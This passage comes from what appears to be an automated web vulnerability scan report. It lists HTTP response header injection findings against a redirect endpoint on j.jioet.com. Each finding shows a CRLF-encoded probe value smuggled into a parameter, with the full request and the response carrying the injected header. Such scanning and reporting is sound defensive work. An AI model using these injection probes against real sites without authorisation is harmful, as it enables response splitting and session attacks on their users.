Set-Cookie: QIDA=TV5qqgqABU0AAARrfuY; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:42 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:42 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk832110218044842248ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:42 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=57288
1f8a21ef9e9
&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=832110218044842248&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 801

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.5. http://j.jioet.com/cgi/r [css parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the css request parameter is copied into the Location response header. The payload c2453%0d%0ad4fa898969d was submitted in the css parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=c2453%0d%0ad4fa898969d&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:01 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qgQqABU0AAEdKNII; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:01 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:01 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk516110218044801584ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:01 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=c2453
d4fa898969d
&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=516110218044801584&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1054

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.6. http://j.jioet.com/cgi/r [ctnum parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the ctnum request parameter is copied into the Location response header. The payload 9df03%0d%0a6d42c08a398 was submitted in the ctnum parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=9df03%0d%0a6d42c08a398&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:46 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qcgqABU0AAG-5ZBk; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:47:46 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:47:46 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk773110218044746465ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:46 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=9df03
6d42c08a398
&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=773110218044746465&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1137

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.7. http://j.jioet.com/cgi/r [fc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the fc request parameter is copied into the Location response header. The payload 324fe%0d%0af3e39cf64e0 was submitted in the fc parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=324fe%0d%0af3e39cf64e0&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:19 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qkwqABU0AAEbtURk; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:19 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:19 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk416110218044819625ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:19 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=324fe
f3e39cf64e0
&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=416110218044819625&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1138

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.8. http://j.jioet.com/cgi/r [ff parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the ff request parameter is copied into the Location response header. The payload aa97d%0d%0abdd9024737e was submitted in the ff parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=aa97d%0d%0abdd9024737e&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:18 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qkgqABU0AAHBvVik; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:18 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:18 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk433110218044818412ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:18 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=aa97d
bdd9024737e
&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=433110218044818412&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1138

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.9. http://j.jioet.com/cgi/r [ft parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the ft request parameter is copied into the Location response header. The payload fb7cd%0d%0adb9c0b1d9c4 was submitted in the ft parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=fb7cd%0d%0adb9c0b1d9c4&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:37 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qaQqABU0AAATvdq0; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:47:37 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:47:37 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk182110218044737313ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:37 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=fb7cd
db9c0b1d9c4
&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=182110218044737313&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1131

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.10. http://j.jioet.com/cgi/r [hidepriv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the hidepriv request parameter is copied into the Location response header. The payload 7e042%0d%0ae45d4f30234 was submitted in the hidepriv parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=7e042%0d%0ae45d4f30234& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:49 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qsQqABU0AAG-VGJo; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:49 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:49 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk533110218044849667ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:49 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=7e042
e45d4f30234
&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=533110218044849667&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1134

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.11. http://j.jioet.com/cgi/r [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a2fcc%0d%0a89eed5f8dfa was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true&&a2fcc%0d%0a89eed5f8dfa=1 HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:53 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qtQqABU0AAFuQIrw; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:53 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
